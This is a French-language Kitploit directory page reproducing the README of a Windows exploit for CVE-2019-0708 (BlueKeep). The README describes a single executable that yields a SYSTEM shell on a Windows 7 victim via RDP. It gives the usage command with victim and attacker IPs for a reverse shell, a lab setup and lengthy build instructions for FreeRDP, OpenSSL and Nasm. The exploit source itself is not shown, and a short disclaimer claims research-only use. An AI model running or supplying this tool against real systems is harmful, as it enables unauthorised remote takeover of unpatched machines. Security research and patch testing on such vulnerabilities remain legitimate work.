Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-0708-EXP-Windows — CVE-2019-0708-EXP version Windows, exe mono-fichier : après exécution, rebondit directement un Shell avec les privilèges System dans la console actuelle. | Kitploit
Outils/GitHubGitHub/cbwang505/cve-2019-0708-exp-windows
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionOutil d'Accès à Distance
GitHubcbwang505/cve-2019-0708-exp-windows

CVE-2019-0708-EXP-Windows

CVE-2019-0708-EXP version Windows, exe mono-fichier : après exécution, rebondit directement un Shell avec les privilèges System dans la console actuelle.

Voir le dépôtSite web
3176822il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-0708-EXP-Windows-Version

Avertissement

Le PoC de l'auteur est uniquement à des fins de recherche. Si le lecteur utilise ce PoC pour d'autres activités, cela n'engage pas ma responsabilité.

Table des matières

[toc]

Introduction

CVE-2019-0708-EXP-Windows est un fichier exe unique, fonctionnant sans Linux, Python, Ruby, etc. Après exécution, il renvoie directement un shell avec les droits System dans la console actuelle.

La compilation utilise un mode de bibliothèque entièrement statique intégrant toutes les DLL, avec netcat et OpenSSL intégrés. Prend en charge l'affichage de la barre de progression et les opérations d'écho du shell.

Environnement de reproduction

  1. Système d'exploitation de la victime : Windows 7 SP1 x64
  2. Système d'exploitation de l'attaquant : Windows 10 x64
  3. Environnement de compilation : Visual Studio 2013

Instructions d'utilisation

  1. Accédez au répertoire CVE-2019-0708-EXP-Release
  2. Exécutez wfreerdp.exe /v:Victim_IP /l:Attacker_IP, par exemple wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

Tutoriel d'installation

  1. Copiez le projet FreeRDP-master vers E:\git\KernelResearch\FreeRDP-master\
  2. Installez l'environnement de compilation OpenSSL, ou décompressez simplement openssl.7z dans C:\openssl\ pour utiliser l'environnement OpenSSL précompilé.
  3. Installez l'environnement de compilation Nasm
  4. Installez cmake-3.15.3-win64-x64.msi en tant qu'administrateur
  5. Ajoutez C:\Program Files\CMake\bin à la variable d'environnement PATH
  6. Redémarrez l'ordinateur
  7. Exécutez "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
  8. Compilez le projet. Si vous constatez qu'il manque encore des fichiers, vous pouvez les restaurer à partir de FreeRDP-master-restore.7z
Tutoriel d'installation de l'environnement de compilation OpenSSL
  1. Décompressez openssl-1.0.2s.tar.gz dans C:\openssl\
  2. Installez ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi
  3. Ajoutez C:\Perl64\bin à la variable d'environnement PATH
  4. Ouvrez l'invite de commande des outils natifs VS2013 x64 (disponible dans le menu Démarrer)
  5. Exécutez perl Configure VC-WIN64A
  6. Exécutez cd /d C:\openssl\
  7. Exécutez ms\do_win64a
  8. Ensuite, commencez la compilation. Les modes suivants peuvent être utilisés ; l'exp utilise le mode bibliothèque statique : Compilation de la bibliothèque dynamique OpenSSL : nmake -f ms\ntdll.mak Compilation de la bibliothèque statique OpenSSL : nmake -f ms\nt.mak Test de la bibliothèque dynamique OpenSSL : nmake -f ms\ntdll.mak test Test de la bibliothèque statique OpenSSL : nmake -f ms\nt.mak test Installation de la bibliothèque dynamique OpenSSL : nmake -f ms\ntdll.mak install Installation de la bibliothèque statique OpenSSL : nmake -f ms\nt.mak install Effacez la compilation précédente de la bibliothèque dynamique OpenSSL pour recompiler : nmake -f ms\ntdll.mak clean Effacez la compilation précédente de la bibliothèque statique OpenSSL pour recompiler : nmake -f ms\nt.mak clean
  9. Une fois terminé, allez dans le dossier out32, trouvez les fichiers libeay32.lib et ssleay32.lib et copiez-les dans C:\openssl\lib\
Tutoriel d'installation de l'environnement de compilation Nasm
  1. Installez nasm-2.14.02-installer-x64.exe en tant qu'administrateur
  2. Ajoutez C:\Program Files\NASM à la variable d'environnement PATH
  3. Décompressez nasmBuildCustomizations.rar et placez les 3 fichiers dans C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
  4. Sélectionnez le répertoire du projet client->common->freerdp-client, faites un clic droit -> "Générer les dépendances" -> "Générer les personnalisations", puis cochez l'élément nasm (attention, pas masm).
  5. Si, dans le projet freerdp-client, vous sélectionnez un fichier .asm et que l'option de compilation apparaît dans le menu contextuel, cela signifie que l'environnement de compilation Nasm a été installé avec succès.

Résultat d'exécution

Cliquez pour voir en grand

Hébergement du projet

Mon adresse PoC

Contribution

L'auteur vient de ZheJiang Guoli Security Technology, email [email protected]

Télécharger l’outil